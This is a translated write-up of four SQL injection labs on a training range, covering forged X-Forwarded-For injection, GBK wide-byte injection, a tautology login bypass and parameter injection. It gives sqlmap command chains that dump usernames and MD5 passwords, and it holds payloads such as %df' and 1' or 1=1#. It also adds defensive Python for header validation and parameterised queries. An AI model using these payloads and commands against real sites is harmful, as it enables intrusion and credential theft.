Web security SQL injection vulnerability (1)
2022-07-06 02:53:00 【Half a watermelon】
SQL injection principle: a malicious user inserts SQL statements into the content of a query request. Because the program trusts user input too much and applies no filtering at all to the SQL the user inserted, the statement is executed directly by the database server.
Contents of the test:
(1) Injection through a forged HTTP header.
(2) Exploitation of a wide byte injection vulnerability.
(3) Login with any password by constructing a statement that bypasses validation.
(4) SQL injection test against the login page.
Test machine: Kali. Link: https://pan.baidu.com/s/1ZKvP-CFYcmhFw3ol5ul4bg
Extraction code: tian
Range: the Mozhe Academy (墨者学院) online shooting range, a platform focused on training network security personnel.
1. Forge HTTP header information to bypass the server's IP address restriction, then find the injection point and obtain the account and password.
Step one: open the login page.
Step two: enter any account and password.
The login fails.
Step three: capture the request with Burp.
Add the header: x-forwarded-for:1.1.1.1
The page echoes the added address 1.1.1.1 back to us (this shows that the header value reaches the server-side query, so the SQL injection is here).
Step four: change the header to x-forwarded-for:* and save the request as a txt file (the * marks the position sqlmap should inject into).
Step five: scan the saved 1.txt file with sqlmap.
command: sqlmap -r /root/1.txt --batch --current-db
【--batch】: accept sqlmap's default answer (y) to every prompt. 【--current-db】: display the database currently in use.
sqlmap finds the injection point in x-forwarded-for.
Step six: view all the tables in the database.
command: sqlmap -r /root/1.txt --batch --tables -D "webcalendar"
【--tables -D "webcalendar"】: display all tables in the webcalendar database.
The webcalendar database contains two tables.
Step seven: view all the columns in the table.
command: sqlmap -r /root/1.txt --batch --columns -T "user"
【--columns -T "user"】: display all columns in the user table.
The user table has three columns.
Step eight: view the contents of the columns.
command: sqlmap -r /root/1.txt --batch --dump -C "username,password"
【--dump -C "username,password"】: dump the contents of the username and password columns.
The dumped contents are the account and password.
Step nine: log in with the account and password to obtain the flag.
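The header injection in section 1 works because the server stores whatever X-Forwarded-For says. The Python below is an added example, not code from the range or from the original write-up: it shows the defender's side, honouring X-Forwarded-For only when it arrives from a trusted proxy and parses as an IP address, writing the result with a parameterised statement, and flagging header values that are not IP addresses (such as the * marker used with sqlmap above). The proxy address, table name and function names are constructed or hypothetical.

```python
# Added example (hypothetical names, constructed data): treating
# X-Forwarded-For so a forged header can neither spoof the client IP
# nor reach a SQL statement as raw text.
import ipaddress
import sqlite3
from typing import Optional

# Constructed: the reverse proxies this application sits behind. A header
# value is considered at all only when the TCP peer is one of these.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}


def client_ip(remote_addr: str, xff_header: Optional[str]) -> str:
    """Return the IP address to record for this request.

    X-Forwarded-For is honoured only when the socket peer is a trusted proxy,
    and only if the right-most hop (the one that proxy appended) parses as an
    IP address. Anything else, including text such as 1.1.1.1', falls back to
    the socket address, so the caller cannot choose what is stored.
    """
    peer = ipaddress.ip_address(remote_addr)
    if peer not in TRUSTED_PROXIES or not xff_header:
        return str(peer)
    last_hop = xff_header.split(",")[-1].strip()
    try:
        return str(ipaddress.ip_address(last_hop))
    except ValueError:
        return str(peer)


def suspicious_xff(header_value: str) -> bool:
    """Detection side: flag a header whose hops are not all IP addresses.
    Such values (quotes, sqlmap's * marker, SQL fragments) are probes, not
    addresses, and are worth alerting on at the proxy or WAF."""
    for hop in header_value.split(","):
        try:
            ipaddress.ip_address(hop.strip())
        except ValueError:
            return True
    return False


def setup_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the range's login log."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login_log (username TEXT, ip TEXT)")
    return conn


def record_login_attempt(conn: sqlite3.Connection, username: str, ip: str) -> None:
    """Parameterised insert: the values travel separately from the SQL text,
    so even a value containing a quote cannot change the statement."""
    conn.execute("INSERT INTO login_log (username, ip) VALUES (?, ?)", (username, ip))


def demo() -> list:
    """A trusted proxy forwards a header carrying a quote: the header is
    rejected, the socket address is stored, and the insert stays intact."""
    conn = setup_db()
    ip = client_ip("10.0.0.5", "1.1.1.1'")
    record_login_attempt(conn, "admin", ip)
    return conn.execute("SELECT username, ip FROM login_log").fetchall()


if __name__ == "__main__":
    print(demo())
    print(suspicious_xff("*"), suspicious_xff("198.51.100.7, 1.1.1.1"))
```

Validating the header as an address and binding it as a parameter are independent controls; the first keeps spoofed values out of access-control decisions, the second keeps any value out of the SQL text.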
2. The login interface has a SQL wide byte injection vulnerability. Enter special characters to make the page report an error, which verifies that SQL injection exists, then use the wide byte injection to find the login account and password.
Step one: open the login page.
Filling in an arbitrary account and password finds nothing. Viewing the page source reveals a hyperlink.
Step two: click the hyperlink here.
This leads to the injection page.
Step three: enter %df' to make the page report an error (this verifies the SQL wide byte injection vulnerability).
Principle of SQL wide byte injection: addslashes() escapes ' to \' by putting a backslash (%5c) in front of it. When the connection uses GBK encoding, the byte %df and the backslash's byte %5c are read as a single two-byte character, which consumes the backslash.
The ' that follows is therefore no longer escaped and breaks out of the SQL string.
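The merging step described above can be reproduced byte by byte. The following Python is an added example, not code from the original write-up or from the range: it emulates PHP's addslashes() on raw bytes, decodes the result the way a MySQL connection whose charset is GBK would, and contrasts that with escaping done after decoding with the connection charset (what mysql_real_escape_string() does once mysql_set_charset() has told the client library the real charset). The function names are hypothetical and the payload bytes are a constructed sample.

```python
# Added example (Python emulation, not the range's PHP code): why addslashes()
# plus a GBK connection lets %df' reach the query with a bare quote.


def addslashes(data: bytes) -> bytes:
    """Byte-level emulation of PHP addslashes(): put a backslash (0x5c) before
    each single quote, double quote, backslash and NUL byte."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def as_seen_by_gbk_connection(escaped: bytes) -> str:
    """Decode the escaped bytes the way a connection whose charset is GBK does.
    In GBK a lead byte 0x81-0xFE takes the next byte (0x40-0xFE) as its trail
    byte, so 0xDF 0x5C is consumed as one character (commonly cited as 運)
    and the quote that follows stands on its own."""
    return escaped.decode("gbk", errors="replace")


def has_bare_quote(fragment: str) -> bool:
    """True if a single quote appears without a backslash directly before it."""
    return any(
        ch == "'" and (i == 0 or fragment[i - 1] != "\\")
        for i, ch in enumerate(fragment)
    )


def escape_after_decode(raw: bytes, charset: str) -> str:
    """Charset-aware escaping: decode with the connection charset first, then
    escape on characters. A lone 0xDF is not a complete GBK sequence and becomes
    U+FFFD, so the quote is seen, and escaped, as a separate character. This
    mirrors mysql_real_escape_string() with the charset set correctly (emulated)."""
    text = raw.decode(charset, errors="replace")
    return (
        text.replace("\\", "\\\\")
        .replace("'", "\\'")
        .replace('"', '\\"')
        .replace("\x00", "\\0")
    )


def compare(payload: bytes = b"\xdf'") -> dict:
    """Run both paths on the same input. The default is the constructed byte
    sequence that the URL parameter %df' arrives as."""
    naive = as_seen_by_gbk_connection(addslashes(payload))
    safe = escape_after_decode(payload, "gbk")
    return {
        "naive_fragment": naive,
        "naive_has_bare_quote": has_bare_quote(naive),
        "safe_fragment": safe,
        "safe_has_bare_quote": has_bare_quote(safe),
    }


if __name__ == "__main__":
    for key, value in compare().items():
        print(key, repr(value))
```

The naive path ends with a quote that no backslash protects; the charset-aware path does not. Parameterised queries sidestep the question entirely, because the value never becomes part of the SQL text in any charset.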
Step four: use sqlmap with its wide byte tamper script.
command: sqlmap -u "http://219.153.49.228:42218/new_list.php?id=1" --tamper=unmagicquotes.py --batch --dbs
【--tamper=unmagicquotes.py】: sqlmap's wide byte tamper script. 【--dbs】: display all databases.
Five databases are found.
Step five: view all the tables in the mozhe_discuz_stormgroup database.
command: sqlmap -u "http://219.153.49.228:42218/new_list.php?id=1" --tamper=unmagicquotes.py --batch --tables -D "mozhe_discuz_stormgroup"
【--tables -D "mozhe_discuz_stormgroup"】: display all tables in the mozhe_discuz_stormgroup database.
Two tables are found (notice and stormgroup_member).
Step six: view what is in the two tables notice and stormgroup_member.
command: sqlmap -u "http://219.153.49.228:42218/new_list.php?id=1" --tamper=unmagicquotes.py --batch --columns -T "notice,stormgroup_member"
【--columns -T "notice,stormgroup_member"】: display all columns in the notice and stormgroup_member tables.
The columns of the notice and stormgroup_member tables are listed.
Step seven: the stormgroup_member table has account and password columns, so we dump the contents of stormgroup_member.
command: sqlmap -u "http://219.153.49.228:42218/new_list.php?id=1" --tamper=unmagicquotes.py --batch --dump -C "name,password"
【--dump -C "name,password"】: dump the contents of the name and password columns.
The account and password are found (the password is an MD5 hash).
Step eight: crack the MD5 hash to recover the password, then log in with the account and password.
3. The login interface accepts any password: construct a statement that bypasses the server-side validation and log in successfully.
Step one: open the login page.
Step two: test whether login with any password is possible, using the universal password:
(1) In the account field enter: 1' or 1=1#
(2) Password: enter anything or leave it blank.
Login succeeds (flag obtained):
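The universal password works because the account field is concatenated into the SQL text. The Python below is an added example, not the range's code or the original write-up's: it runs the same login check two ways against an in-memory SQLite table holding one constructed user, so the effect of the tautology and of the parameterised fix can be compared directly. SQLite has no # comment, so the tautology is written 1' or 1=1-- here where the range's MySQL payload uses #; the table and column names are hypothetical.

```python
# Added example (constructed data, hypothetical schema): the login check as
# string concatenation versus as a parameterised query.
import hashlib
import sqlite3


def setup() -> sqlite3.Connection:
    """Constructed users table. MD5 is used only because the range stores MD5
    digests; a real application should use a slow, salted password hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_md5 TEXT)")
    conn.execute(
        "INSERT INTO users VALUES (?, ?)",
        ("alice", hashlib.md5(b"correct horse").hexdigest()),
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """User input is pasted into the SQL text: a quote in the username closes
    the string literal, and everything after it is parsed as SQL."""
    pw = hashlib.md5(password.encode()).hexdigest()
    sql = (
        "SELECT COUNT(*) FROM users WHERE username = '"
        + username
        + "' AND password_md5 = '"
        + pw
        + "'"
    )
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Placeholders keep the values out of the SQL text: the tautology is
    compared literally against the username column and matches no row."""
    pw = hashlib.md5(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT COUNT(*) FROM users WHERE username = ? AND password_md5 = ?",
        (username, pw),
    ).fetchone()
    return row[0] > 0


# SQLite form of the range's 1' or 1=1# payload (-- is SQLite's line comment).
PAYLOAD = "1' or 1=1--"


if __name__ == "__main__":
    db = setup()
    print("vulnerable, payload:", login_vulnerable(db, PAYLOAD, "anything"))
    print("safe, payload:      ", login_safe(db, PAYLOAD, "anything"))
    print("safe, real creds:   ", login_safe(db, "alice", "correct horse"))
```

With the concatenated query the WHERE clause becomes username = '1' or 1=1 followed by a comment, so the password check never runs; with placeholders the same text is just an unusual username that exists for nobody.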
4. SQL injection test against the login page: obtain the account and password from the current database.
Step one: click the hyperlink.
On the page it leads to, the link carries ?id=1.
Step two: use sqlmap to find out whether a SQL injection vulnerability exists.
command: sqlmap -u "http://219.153.49.228:49655/new_list.php?id=1" --batch --current-db
【--batch】: accept sqlmap's default answer (y) to every prompt. 【--current-db】: display the database currently in use.
Four injection points and the name of the current database are found.
Step three: view all the tables in the mozhe_discuz_stormgroup database.
command: sqlmap -u "http://219.153.49.228:49655/new_list.php?id=1" --batch --tables -D "mozhe_discuz_stormgroup"
【--tables -D "mozhe_discuz_stormgroup"】: display all tables in the mozhe_discuz_stormgroup database.
Two tables are found in the mozhe_discuz_stormgroup database.
Step four: view all the columns in the stormgroup_member table.
command: sqlmap -u "http://219.153.49.228:49655/new_list.php?id=1" --batch --columns -T "stormgroup_member"
【--columns -T "stormgroup_member"】: display all columns in the stormgroup_member table.
The stormgroup_member table has three columns.
Step five: view the contents of the two columns name and password.
command: sqlmap -u "http://219.153.49.228:49655/new_list.php?id=1" --batch --dump -C "name,password"
【--dump -C "name,password"】: dump the contents of the name and password columns.
The account and password are found (the password is an MD5 hash). They are exactly the same account and password as in question 2.
Step six: crack the MD5 hash to recover the password, then log in with the account and password.